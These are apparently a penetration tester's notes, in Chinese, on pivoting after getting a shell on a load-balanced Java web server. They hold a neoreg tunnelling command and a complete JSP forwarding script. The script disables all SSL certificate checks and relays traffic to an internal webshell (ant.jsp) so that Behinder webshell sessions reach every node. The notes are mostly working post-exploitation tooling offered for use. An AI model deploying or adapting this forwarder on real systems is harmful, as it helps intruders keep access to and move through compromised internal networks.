代理
可以做代理的情况下,neoreg工具具有内网转发的情况下
1 2
| kali踩坑 https挂burp python3 neoreg.py -k password -u https://xxx/111tun.jspx -r https://xxx/111tun.jspx --proxy http://127.0.0.1:8080
|
做不了代理的情况—>
先决条件
getshell之后遇到负载均衡不能直接上cs的情况
- getshell之后server.xml找到本地开放端口
- 负载均衡机器内网互通curl -k -i http://192.168.11.2:22222
- 确保antproxy.jsp所有机器都存在该文件
实现
忽略ssl证书参考http://alifrp.yllcc.com:8443/article/9
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86
| <%@ page contentType="text/html;charset=UTF-8" language="java" %> <%@ page trimDirectiveWhitespaces="true" %> <%@ page import="javax.net.ssl.*" %> <%@ page import="java.io.ByteArrayOutputStream" %> <%@ page import="java.io.DataInputStream" %> <%@ page import="java.io.InputStream" %> <%@ page import="java.io.OutputStream" %> <%@ page import="java.net.HttpURLConnection" %> <%@ page import="java.net.URL" %> <%@ page import="java.security.KeyManagementException" %> <%@ page import="java.security.NoSuchAlgorithmException" %> <%@ page import="java.security.cert.CertificateException" %> <%@ page import="java.security.cert.X509Certificate" %> <%! public static void ignoreSsl() throws Exception { HostnameVerifier hv = new HostnameVerifier() { public boolean verify(String urlHostName, SSLSession session) { return true; } }; trustAllHttpsCertificates(); HttpsURLConnection.setDefaultHostnameVerifier(hv); } private static void trustAllHttpsCertificates() throws Exception { TrustManager[] trustAllCerts = new TrustManager[] { new X509TrustManager() { public X509Certificate[] getAcceptedIssuers() { return null; } @Override public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException { } @Override public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException { } } }; try { SSLContext sc = SSLContext.getInstance("TLS"); sc.init(null, trustAllCerts, new java.security.SecureRandom()); HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory()); } catch (KeyManagementException e) { e.printStackTrace(); } catch (NoSuchAlgorithmException e) { e.printStackTrace(); } } %> <% //创建URL实力类 String target = "https://192.168.11.2:22222/ant.jsp"; URL url = new URL(target); if ("https".equalsIgnoreCase(url.getProtocol())) { ignoreSsl(); } HttpURLConnection conn = (HttpURLConnection)url.openConnection();//设置代理openConnection(proxy) conn.setRequestMethod(request.getMethod()); conn.setConnectTimeout(30000); conn.setDoOutput(true); conn.setDoInput(true); conn.setInstanceFollowRedirects(false);//禁止重定向 conn.connect();//打开与此URL引用的资源的通信链接,如果此类连接尚未建立
ByteArrayOutputStream baos=new ByteArrayOutputStream(); OutputStream antout = conn.getOutputStream();//获取建立连接的输出流 DataInputStream in=new DataInputStream(request.getInputStream());//从request中获取输入流out2 byte[] buf = new byte[1024]; int len = 0; while ((len = in.read(buf)) != -1) { baos.write(buf, 0, len); } baos.flush(); baos.writeTo(antout);//接收到的文件流写入到out2,也就是建立连接之后的输出流转发到内网IP baos.close();
InputStream inputStream = conn.getInputStream();//获取链接的输入流也就是返回执行结果的数据,字节流冰蝎返回是字节码 OutputStream forwardout=response.getOutputStream(); int len2 = 0; while ((len2 = inputStream.read(buf)) != -1) { forwardout.write(buf, 0, len2); } forwardout.flush(); forwardout.close(); %>
|
遇到一个坑就是真实环境下需要设置<%@ page trimDirectiveWhitespaces=”true” %>
缺点:文件上传功能是用不,会分片上传到node
参考https://mp.weixin.qq.com/s/4Bmz_fuu0yrLMK1oBKKtRA
https://www.matools.com/file/manual/jdk_api_1.8_google/java/net/HttpURLConnection.html
https://www.matools.com/file/manual/jdk_api_1.8_google/java/net/URL.html